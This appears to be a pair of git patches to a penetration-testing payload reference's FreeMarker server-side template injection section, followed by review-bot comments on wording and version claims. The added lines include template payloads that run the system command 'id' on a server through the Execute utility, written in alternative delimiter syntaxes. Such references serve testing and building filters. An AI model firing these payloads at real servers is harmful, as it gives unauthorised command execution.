From 29c23ac7fdbd8acb0f38fa17cfa216454c3072c5 Mon Sep 17 00:00:00 2001 From: Aur0ra <103031059+Aur0ra-m@users.noreply.github.com> Date: Tue, 27 Dec 2022 18:30:20 +0800 Subject: [PATCH 1/2] Update README.md --- Server Side Template Injection/README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 656dc05..875c22a 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -199,7 +199,7 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre ### Freemarker - Basic injection -The template can be `${3*3}` or the legacy `#{3*3}`. +The template can be `${3*3}` `#{3*3}` or the legacy `[=3*3]`. ### Freemarker - Read File @@ -214,6 +214,8 @@ Convert the returned bytes to ASCII <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} ${"freemarker.template.utility.Execute"?new()("id")} +#{"freemarker.template.utility.Execute"?new()("id")} +[="freemarker.template.utility.Execute"?new()("id")] ``` ### Freemarker - Sandbox bypass From f318f8bcc044f126e1b8e42e4d3c8b8c3e9389c9 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Tue, 27 Dec 2022 18:26:13 +0100 Subject: [PATCH 2/2] Update README.md --- Server Side Template Injection/README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 875c22a..6018c46 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -199,7 +199,11 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre ### Freemarker - Basic injection -The template can be `${3*3}` `#{3*3}` or the legacy `[=3*3]`. +The template can be : + +* Default: `${3*3}` +* Legacy: `#{3*3}` +* Alternative: `[=3*3]` since [FreeMarker 2.3.4](https://freemarker.apache.org/docs/dgui_misc_alternativesyntax.html) ### Freemarker - Read File
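Review bot: In the first hunk of PATCH 1/2 (Freemarker - Basic injection), the added line moves the word "legacy" from `#{3*3}` to `[=3*3]`, although the removed line called `#{3*3}` the legacy form, so the label now contradicts the text it replaces. The added line also has no separator between `${3*3}` and `#{3*3}`. Suggest keeping "legacy" attached to `#{3*3}`, describing `[=3*3]` separately, and putting commas between the three forms.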
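Review bot: In the second hunk of PATCH 1/2, the two added lines in the code block (the `#{...}` and `[=...]` variants) repeat the existing `${"freemarker.template.utility.Execute"?new()("id")}` line with only the delimiters changed, and nothing in the block says which interpolation syntax each line depends on. Suggest a one-line note above the block that maps each line to its syntax. That note would also tell readers who write input filters or detection rules that matching on `${` alone does not cover the other two delimiters.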
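Review bot: In the PATCH 2/2 hunk, "The template can be :" has a stray space before the colon and reads as an unfinished sentence; something like "The template can use one of these interpolation syntaxes:" would introduce the list more clearly. On the `[=3*3]` bullet, the "since FreeMarker 2.3.4" claim rests only on the link, and the link target (dgui_misc_alternativesyntax.html) is a general alternative-syntax page, so please confirm that the version applies to the `[=...]` interpolation specifically before stating it here.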